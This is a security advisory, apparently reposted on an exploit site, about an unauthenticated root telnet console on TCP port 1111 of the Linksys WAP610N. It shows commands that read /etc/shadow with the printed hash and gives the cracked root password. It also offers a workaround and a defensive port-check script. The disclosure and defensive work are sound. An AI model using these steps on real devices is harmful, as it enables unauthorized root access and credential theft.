Linksys WAP610N Unauthenticated Root Access Security Vulnerability

2011-02-10T00:00:00
ID 1337DAY-ID-15130
Type zdt
Reporter Matteo Ignaccolo
Modified 2011-02-10T00:00:00

Description

Exploit for hardware platform in category remote exploits

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo () securenetwork it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL:
http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt
 
 
*** SUMMARY ***
 
Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
 
An unauthenticated, remotely reachable text-based administration console has been
found that allows an attacker to run system commands as the root user.
 
 
*** VULNERABILITY DETAILS ***
 
telnet <access-point IP> 1111
 
Command> system id
Output>  uid=0(root) gid=0(root)
 
Command> system cat /etc/shadow
Output>  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Output>  bin:*:10933:0:99999:7:::
Output>  daemon:*:10933:0:99999:7:::
Output>  adm:*:10933:0:99999:7:::
Output>  lp:*:10933:0:99999:7:::
Output>  sync:*:10933:0:99999:7:::
Output>  shutdown:*:10933:0:99999:7:::
Output>  halt:*:10933:0:99999:7:::
Output>  uucp:*:10933
 
The root password is "wlan" (cracked with MDcrack, http://mdcrack.openwall.net).
 
List of console commands:
 
ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ
HYP_WRITE
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER
 
 
*** EXPLOIT ***
 
Attackers may exploit this issue with a standard telnet client, as shown
above.
 
 
*** FIX INFORMATION ***
 
No patch is available.
 
*** WORKAROUNDS ***
 
Put the access points on a separate wired network and filter network traffic
to/from TCP port 1111.
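As an added example (not part of the original advisory), the following Python check verifies that the workaround is actually in place from the network segment it is run on: it attempts a plain TCP connection to port 1111 on each access point address and reports any console that still answers. Nothing is sent to the console; only the handshake is tested. The script name, the address list and the placeholder addresses in the usage block are constructed for this example.

```python
"""Audit whether the WAP610N console port (TCP 1111) is reachable.

Added example, not the advisory's own code: checks the advisory's
workaround (filter traffic to/from TCP port 1111 on the access points).
Host addresses are supplied by the operator; the addresses in the
__main__ block are constructed placeholders from the RFC 5737 range.
"""
import socket
import sys
from typing import Dict, Iterable

# Port of the unauthenticated console named in the advisory.
CONSOLE_PORT = 1111


def console_reachable(host: str, port: int = CONSOLE_PORT,
                      timeout: float = 2.0) -> bool:
    """Return True if a TCP handshake to host:port completes.

    Only the connection attempt is made; no command is sent.  A filtered
    port normally times out and a closed port is refused; both count as
    "not reachable", which is the state the workaround should produce.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0


def audit(hosts: Iterable[str], port: int = CONSOLE_PORT,
          timeout: float = 2.0) -> Dict[str, bool]:
    """Map each host to whether its console port is reachable from here."""
    return {host: console_reachable(host, port, timeout) for host in hosts}


def report(results: Dict[str, bool]) -> int:
    """Print one line per host and return the number of exposed consoles."""
    exposed = 0
    for host, reachable in sorted(results.items()):
        if reachable:
            exposed += 1
            status = f"EXPOSED  (filter TCP/{CONSOLE_PORT})"
        else:
            status = "filtered/closed"
        print(f"{host:<16} {status}")
    return exposed


if __name__ == "__main__":
    # Usage: python audit_wap610n.py 192.0.2.10 192.0.2.11
    # Exit status 1 if any console is still reachable, so the check can
    # be scheduled and alerted on.
    targets = sys.argv[1:] or ["192.0.2.10"]
    sys.exit(1 if report(audit(targets)) else 0)
```

Run it from the user or guest segment that should be cut off from the access points; a clean result there, and a reachable result from the management segment, confirms the filter sits where the workaround intends.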
 


#  0day.today [2018-01-06]  #